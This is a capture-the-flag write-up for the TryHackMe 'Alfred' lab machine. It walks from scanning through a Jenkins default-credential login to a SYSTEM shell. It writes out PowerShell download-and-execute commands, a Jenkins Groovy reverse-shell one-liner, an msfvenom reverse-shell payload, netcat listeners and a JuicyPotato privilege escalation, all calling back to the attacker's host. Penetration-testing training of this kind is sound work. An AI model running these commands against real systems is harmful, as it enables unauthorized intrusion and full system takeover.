Alfred THM

TryHackMe Machine

IP

10.10.137.98

Initial Nmap scan

nmap -sV -sC -A -oA nmap_results 10.10.137.98

• -sV: Version detection on the open ports it find (finding services running on the machine)

• -sC: Enables the use of Nmaps NSE (Nmap Scripting Engine) scripts with the default set of scripts

• -A: Essentially a shorthand to tell Nmap to find services (-sV), script scanning (-sC), OS detection and traceroute

• -oA

Looks like we have three ports open

80: HTTP

3389: RDP

8080: HTTP

Port 80 HTTP

when we navigate to the web page, it seems to be static with no functionality except for remembering the once-great batman.

We do find an email address

alfred@wayneenterprises.com

and maybe a possible username

Bruce Wayne

We check the page Source but found nothing interesting

Let's try and find some hidden directories

we can use feroxbuster

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.137.98 -o dirs.txt

• Nothing of great interest was found

Port 8080 HTTP

When we navigate to the web page we do find Jenkins.

But wait what is jenkins?

• Jenkins is an open-source automation server used for continuous integration and continuous delivery (CI/CD) of software projects, written in Java and provides a web-based user interface to manage and configure various automation tasks in software development and its default creds are admin: admin

woohoo, we are in!

Establishing a Reverse shell through Jenkins

Okay doing a quick Google search there is a way to establish a reverse shell through Jenkins Script console so to get there “Manage Jenkins” → “Script Console”

what’s interesting about the script console is uses Groovy script in the context of Jenkins

• Groovy is the scripting language used to write scripts for Jenkins Pipelines and other automation tasks. Jenkins Pipelines is a suite of plugins that support building continuous delivery pipelines using code written in Groovy, but for us its a way to talk to the backend server and establish a shell to do so

We are going to use the following repo

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Within the Nishang repo, we can find "Invoke-PowerShellTcp.ps1"

/opt/nishang/Shells/Invoke-PowerShellTcp.ps1

let's copy it to our working directory

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./

okay we can use the script console to execute PowerShell commands to pick up our Invoke-PowerShellTcp.ps1

run the Invoke-PowerShellTcp.ps1 script with our IP and Port number as parameters

first things first we need to bring up a Python3 server

python3 -m http.server 8080

Set up a netcat listener

nc -lvnp 9001

Once our server and listener are set let's run the Groovy script

okay we can use the script console to execute PowerShell commands to pick up our Invoke-PowerShellTcp.ps1

run the Invoke-PowerShellTcp.ps1 script with our IP and Port number as parameters

print "powershell IEX(New-Object Net.WebClient).downloadString('http://10.14.45.1:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.14.45.1 -Port 9001".execute().text

We now have a shell as the user bruce.

Privilege Escalation via bruce

First thing first let's get some information about the system we are on

systeminfo

let's find the users on the system

net user

• Nothing too interesting here

Let's see if our user 'bruce" has any privileges

whoami /priv

• This looks interesting

if we refer to https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato and https://ohpe.it/juicy-potato/

• we can use the tool juicypotato to take advantage of the SeimpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled on the machine to elevate the local privilege to System,

• Normally, these privileges are assigned to service users, admins, and local systems (high-integrity users)

• bonus tip: If the machine is running IIS or SQL services, these privileges will be enabled by default

first, we need some a fresh potato

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

second we need to find the right CLSID for our system, remember when we checked the system info we are currently on a Windows 7 machine, we can navigate to https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise/

we now have the CLSID

{03ca98d6-ff5d-49b8-abc6-03dd84127020}

Third, we need to generate a reverse shell, we will use msfvenom for this

msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=10.14.45.1 LPORT=9002 > /home/kali/Desktop/alfred/rev.exe

fourth lets set up a netcat listener to catch the reverse shell

nc -lvnp 9002

Now that we have our rev.exe (reverse shell) and our fresh potato (JuicyPotato.exe) lets transfer them onto the target system

Set up a Python3 server

python3 -m http.server 8080

from our target machine

IEX "(New-Object Net.WebClient).Downloadfile('http://10.14.45.1:8080/JuicyPotato.exe', 'C:/Users/bruce/Desktop/jp.exe')"

IEX "(New-Object Net.WebClient).Downloadfile('http://10.14.45.1:8080/rev.exe', 'C:/Users/bruce/Desktop/rev.exe')"

Now we should have all the files we need to establish a reverse shell as NT AUTHORITY\SYSTEM

Performing juicypotato attack

.\jp.exe -l 1337 -c "{03ca98d6-ff5d-49b8-abc6-03dd84127020}" -p rev.exe -a "/c net user" -t *

when we look back at our netcat listener

We now have a shell as nt authority\system